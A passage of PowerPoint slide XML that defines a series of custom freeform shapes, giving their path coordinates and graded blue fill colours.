        <p:spPr>
          <a:xfrm>
            <a:off x="3683160" y="3686040"/>
            <a:ext cx="9000" cy="10800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6" h="7">
                <a:moveTo>
                  <a:pt x="4" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="7"/>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508" name="CustomShape 296"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3611520" y="3538440"/>
            <a:ext cx="28080" cy="147240"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="18" h="93">
                <a:moveTo>
                  <a:pt x="6" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="93"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="93"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2"/>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509" name="CustomShape 297"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3767040" y="3521160"/>
            <a:ext cx="42480" cy="164880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="27" h="104">
                <a:moveTo>
                  <a:pt x="27" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="25" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="92"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="3F9EFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="CustomShape 298"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3611520" y="3546360"/>
            <a:ext cx="26640" cy="129960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17" h="82">
                <a:moveTo>
                  <a:pt x="6" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2"/>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511" name="CustomShape 299"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3613320" y="3556080"/>
            <a:ext cx="21960" cy="109080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14" h="69">
                <a:moveTo>
                  <a:pt x="5" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="1"/>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512" name="CustomShape 300"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3614760" y="3565440"/>
            <a:ext cx="18720" cy="90000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12" h="57">
                <a:moveTo>
                  <a:pt x="4" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="1"/>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513" name="CustomShape 301"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3614760" y="3573360"/>
            <a:ext cx="14040" cy="70920"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9" h="45">
                <a:moveTo>
                  <a:pt x="4" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4"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514" name="CustomShape 302"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3616200" y="3581280"/>
            <a:ext cx="10800" cy="53640"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7" h="34">
                <a:moveTo>
                  <a:pt x="3" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="2"/>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515" name="CustomShape 303"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3768840" y="3530520"/>
            <a:ext cx="36000" cy="144000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="23" h="91">
                <a:moveTo>
                  <a:pt x="23" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="59B2FF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516" name="CustomShape 304"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3770280" y="3541680"/>
            <a:ext cx="29880" cy="122040"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="19" h="77">
                <a:moveTo>
                  <a:pt x="19" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="72C6FF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="517" name="CustomShape 305"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3772080" y="3549600"/>
            <a:ext cx="23400" cy="102960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="15" h="65">
                <a:moveTo>
                  <a:pt x="15" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="8CD8FF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="518" name="CustomShape 306"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3772080" y="3559320"/>
            <a:ext cx="20160" cy="82080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="13" h="52">
                <a:moveTo>
                  <a:pt x="13" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="A5EDFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="CustomShape 307"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3773520" y="3570120"/>
            <a:ext cx="15480" cy="60120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10" h="38">
                <a:moveTo>
                  <a:pt x="10" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BFFFFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
